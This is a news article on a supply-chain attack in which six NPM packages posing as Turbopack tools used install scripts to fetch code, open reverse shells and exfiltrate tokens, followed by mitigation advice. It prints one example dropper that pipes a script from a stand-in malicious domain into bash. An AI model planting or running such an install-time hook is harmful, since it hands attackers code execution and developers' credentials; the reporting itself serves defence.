Developers Beware: Malicious Code Found in Widely-Used NPM Packages—Act Now
Six widely-used NPM packages compromised with malware targeting developer environments, prompting urgent warnings for JavaScript and Node.js communities.
Malware Injected into Six NPM Packages in Major Open-Source Supply Chain Breach
By El Ouchen, International Cybersecurity Correspondent
July 20, 2025
In a stark reminder of the fragility of the global software supply chain, security researchers have uncovered a malware campaign embedded in six NPM packages, affecting thousands of developers and potentially compromising enterprise software worldwide. The packages were laced with malicious code designed to steal credentials, execute remote commands, and maintain persistent access to infected systems.
Discovered by the cybersecurity firm Checkmarx and first reported by The Hacker News, the campaign was traced to an attacker identified as “ClassicSpace”, who appears to have used social engineering and fake developer identities to introduce the malicious modules.
Affected Packages and Technical Breakdown
The malicious packages, now removed from the NPM registry, include:
turbopack-cli
turbopack-core
turbo-install-global
turbo-module
turbopack-util
turbopack-bin
These packages masqueraded as legitimate developer tools for managing JavaScript or TurboPack-based projects.
How the Malware Works:
- Once installed, the packages downloaded obfuscated JavaScript from remote servers; the download ran from an install-time script, so no user action beyond npm install was needed.
- The payload initiated reverse shell connections, enabling attackers to run commands on infected machines.
- Additional modules retrieved via curl were saved to disk, marked executable with chmod +x, and run with whatever privileges the installing user or CI job already had.
- Sensitive environment variables and tokens were exfiltrated to attacker-controlled domains via HTTP POST requests.
Example of a malicious payload:
```javascript
// Install-time dropper: fetches a remote shell script and pipes it
// straight into bash, running with the privileges of whoever ran npm install.
const exec = require('child_process').exec;
exec('curl -s http://malicious-domain.com/payload.sh | bash');
```
Some packages even mimicked Next.js’s “Turbopack” ecosystem, a popular Webpack alternative, to deceive developers.
Human and Industry Impact
Thousands of developers globally—including those working on enterprise applications—may have unknowingly introduced the malware into CI/CD pipelines, internal development environments, or production builds. This elevates the risk from mere infection to deep systemic compromise.
“This is a textbook case of a supply chain attack—what makes it terrifying is how trusted ecosystems like NPM can become silent attack vectors,” said Hila Cohen, a supply chain risk analyst at MITRE.
Organizations that run npm install automatically in CI/CD pipelines, or that resolve dependencies without pinning and verifying what gets installed, are particularly vulnerable: install-time lifecycle scripts execute with no user interaction.
Response and Mitigation
NPM’s security team swiftly removed the compromised packages and issued public advisories. However, due to the popularity of automated installs and wide propagation, many systems remain exposed.
Recommended Actions:
- Immediately remove any of the six identified packages, then audit every host and pipeline that installed them; treat credentials and tokens that were present in those environments as compromised and rotate them.
- Scan logs for suspicious outbound connections to unrecognized domains.
- Commit a lockfile (package-lock.json) and install with npm ci, so that dependency versions cannot change silently between builds.
- Verify what you install: npm audit flags versions with published advisories, and Sigstore-based npm provenance attestations let you check that a package was built from the repository it claims to come from. Pair both with runtime monitoring.
Organizations are also urged to integrate Software Bill of Materials (SBOMs) into their DevSecOps practices to identify malicious components in the future.
Broader Significance
This incident mirrors high-profile breaches like SolarWinds and UAParser.js, reaffirming that open-source ecosystems, while powerful, are also soft targets for cybercriminals.
“Supply chain attacks are no longer theoretical—they are an operational reality,” said Asaf Karas, CTO of Checkmarx. “Developers must rethink trust in code, even when it comes from familiar registries.”
The campaign also emphasizes the need for global cooperation among package maintainers, security researchers, and platform vendors to ensure timely threat detection and response.
Conclusion
As the digital world leans heavily on open-source software, the exploitation of platforms like NPM becomes a high-value avenue for cyber attackers. This breach serves as a sobering warning: vigilance, transparency, and proactive tooling are not optional—they are foundational.